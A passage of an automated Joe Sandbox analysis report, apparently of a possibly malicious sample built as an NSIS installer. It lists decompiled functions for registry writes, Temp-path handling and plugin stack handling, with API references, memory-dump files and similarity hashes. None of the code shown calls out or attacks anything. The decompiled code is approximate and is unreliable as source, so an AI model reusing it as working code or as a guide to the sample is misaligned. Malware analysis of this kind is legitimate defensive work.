				wsprintfW(_t34 + lstrlenW(0x7a1f48) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a38, _a4, 0x7a1f48);
			}



















                                                                                                                              0x00404d2c
                                                                                                                              0x00404d31
                                                                                                                              0x00404d39
                                                                                                                              0x00404d3a
                                                                                                                              0x00404d47
                                                                                                                              0x00404d4f
                                                                                                                              0x00404d50
                                                                                                                              0x00404d52
                                                                                                                              0x00404d54
                                                                                                                              0x00404d56
                                                                                                                              0x00404d59
                                                                                                                              0x00404d59
                                                                                                                              0x00404d60
                                                                                                                              0x00404d66
                                                                                                                              0x00404d66
                                                                                                                              0x00404d6d
                                                                                                                              0x00404d74
                                                                                                                              0x00404d77
                                                                                                                              0x00404d7a
                                                                                                                              0x00404d7a
                                                                                                                              0x00404d7e
                                                                                                                              0x00404d8e
                                                                                                                              0x00404d90
                                                                                                                              0x00404d93
                                                                                                                              0x00404d3c
                                                                                                                              0x00404d3c
                                                                                                                              0x00404d43
                                                                                                                              0x00404d43
                                                                                                                              0x00404d9b
                                                                                                                              0x00404da6
                                                                                                                              0x00404dbc
                                                                                                                              0x00404dcd
                                                                                                                              0x00404de9

                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                                                                                                                              • wsprintfW.USER32 ref: 00404DCD
                                                                                                                              • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404DE0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                              • Opcode ID: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                                                                                                                              • Instruction ID: 68f5f2c35a4a9d0707adcc228443cff0cbca91619b9e39d4db13cc85b0838dbb
                                                                                                                              • Opcode Fuzzy Hash: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                                                                                                                              • Instruction Fuzzy Hash: C911A5736041283BDB1065ADAC45EAE329C9F86334F250237FA66F71D5EA79981182E8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 83%
                                                                                                                              			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5c8 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
				return 0;
			}












                                                                                                                              0x0040248a
                                                                                                                              0x0040248a
                                                                                                                              0x0040248a
                                                                                                                              0x0040248a
                                                                                                                              0x0040248d
                                                                                                                              0x00402494
                                                                                                                              0x0040249e
                                                                                                                              0x004024a1
                                                                                                                              0x004024aa
                                                                                                                              0x004024b1
                                                                                                                              0x004024b8
                                                                                                                              0x004024bb
                                                                                                                              0x004024c1
                                                                                                                              0x004024cb
                                                                                                                              0x004024cf
                                                                                                                              0x004024da
                                                                                                                              0x004024da
                                                                                                                              0x004024e1
                                                                                                                              0x004024eb
                                                                                                                              0x004024f1
                                                                                                                              0x004024f4
                                                                                                                              0x004024f4
                                                                                                                              0x004024f8
                                                                                                                              0x00402504
                                                                                                                              0x00402504
                                                                                                                              0x0040251d
                                                                                                                              0x0040251f
                                                                                                                              0x0040251f
                                                                                                                              0x00402522
                                                                                                                              0x004025fd
                                                                                                                              0x004025fd
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso8B47.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024D5
                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402515
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025FD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nso8B47.tmp
                                                                                                                              • API String ID: 2655323295-4031543071
                                                                                                                              • Opcode ID: a979bc7346380cecd7475a45158651290d955060ff6c70b6f24626f2f53e06a8
                                                                                                                              • Instruction ID: 3228b6dbd083cda5ecf055ca6763daeb969d91bf2f3b8010d8844d1cd476a235
                                                                                                                              • Opcode Fuzzy Hash: a979bc7346380cecd7475a45158651290d955060ff6c70b6f24626f2f53e06a8
                                                                                                                              • Instruction Fuzzy Hash: CF117C71E00118BEEB11AFA5DE49EAEBAB8FF44758F11443BF504B61C1D7B88D409A68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405EF1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 53%
                                                                                                                              			E00405EF1(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040651A(0x7a4750, _a4);
				_t21 = E00405E94(0x7a4750);
				if(_t21 != 0) {
					E004067A1(_t21);
					if(( *0x7a8a78 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4750 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4750);
							_push(0x7a4750);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406850();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E35(0x7a4750);
								continue;
							} else {
								goto L1;
							}
						}
						E00405DE9();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                                                              0x00405efd
                                                                                                                              0x00405f08
                                                                                                                              0x00405f0c
                                                                                                                              0x00405f13
                                                                                                                              0x00405f1f
                                                                                                                              0x00405f2f
                                                                                                                              0x00405f31
                                                                                                                              0x00405f49
                                                                                                                              0x00405f4a
                                                                                                                              0x00405f51
                                                                                                                              0x00405f52
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405f35
                                                                                                                              0x00405f3c
                                                                                                                              0x00405f44
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405f3c
                                                                                                                              0x00405f54
                                                                                                                              0x00000000
                                                                                                                              0x00405f68
                                                                                                                              0x00405f21
                                                                                                                              0x00405f27
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405f27
                                                                                                                              0x00405f0e
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                                                                                                                                • Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,76D73420,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76D73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                                                                                                                                • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                                                                                                                                • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso8B47.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,76D73420,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76D73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F4A
                                                                                                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,76D73420,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76D73420,C:\Users\user\AppData\Local\Temp\), ref: 00405F5A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nso8B47.tmp
                                                                                                                              • API String ID: 3248276644-3418737823
                                                                                                                              • Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                                                                                                                              • Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
                                                                                                                              • Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                                                                                                                              • Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405E94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00405E94(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405E16(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}









                                                                                                                              0x00405e9d
                                                                                                                              0x00405ea4
                                                                                                                              0x00405ea7
                                                                                                                              0x00405ea9
                                                                                                                              0x00405eaf
                                                                                                                              0x00405ec7
                                                                                                                              0x00405ee9
                                                                                                                              0x00000000
                                                                                                                              0x00405ecf
                                                                                                                              0x00405ed1
                                                                                                                              0x00405ed2
                                                                                                                              0x00405ed5
                                                                                                                              0x00405ed6
                                                                                                                              0x00405edf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405ee2
                                                                                                                              0x00405ee5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405ee5
                                                                                                                              0x00000000
                                                                                                                              0x00405ed2
                                                                                                                              0x00405ebe
                                                                                                                              0x00000000
                                                                                                                              0x00405ebf

                                                                                                                              APIs
                                                                                                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,C:\Users\user\AppData\Local\Temp\nso8B47.tmp,76D73420,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76D73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                                                                                                                              • CharNextW.USER32(00000000), ref: 00405EA7
                                                                                                                              • CharNextW.USER32(00000000), ref: 00405EBF
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\nso8B47.tmp, xrefs: 00405E95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharNext
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nso8B47.tmp
                                                                                                                              • API String ID: 3213498283-4031543071
                                                                                                                              • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                              • Instruction ID: c1792dff9018e3c7d7ac3158fe05bd311bc395bc4b40032904b556d4a70b82f0
                                                                                                                              • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                              • Instruction Fuzzy Hash: 83F09031920F1195DB31B754CC55E7766BCEB98765B00843BE681B72C1D3B88A828AEA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405DE9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 58%
                                                                                                                              			E00405DE9(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                                                              0x00405dea
                                                                                                                              0x00405df7
                                                                                                                              0x00405df8
                                                                                                                              0x00405e03
                                                                                                                              0x00405e0b
                                                                                                                              0x00405e0b
                                                                                                                              0x00405e13

                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DEF
                                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DF9
                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0B
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 2659869361-3355392842
                                                                                                                              • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                              • Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
                                                                                                                              • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                              • Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 6F0010E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E6F0010E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x6f00506c = _a8;
				 *0x6f005070 = _a16;
				 *0x6f005074 = _a12;
				_a12( *0x6f005048, E6F001651, _t73);
				_t66 =  *0x6f00506c +  *0x6f00506c * 4 << 3;
				_t27 = E6F0012E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x6f005040;
							if( *0x6f005040 == 0) {
								goto L26;
							}
							E6F001603( *0x6f005074, _t31 + 4, _t66);
							_t34 =  *0x6f005040;
							_t86 = _t86 + 0xc;
							 *0x6f005040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6F001312(E6F00135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6F001381(_t80, E6F0012E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E6F001603(_t10,  *0x6f005074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x6f005040;
							 *0x6f005040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x6f005070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E6F001603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x6f00506c +  *0x6f00506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E6F001603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x6f005070);
						 *( *0x6f005070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
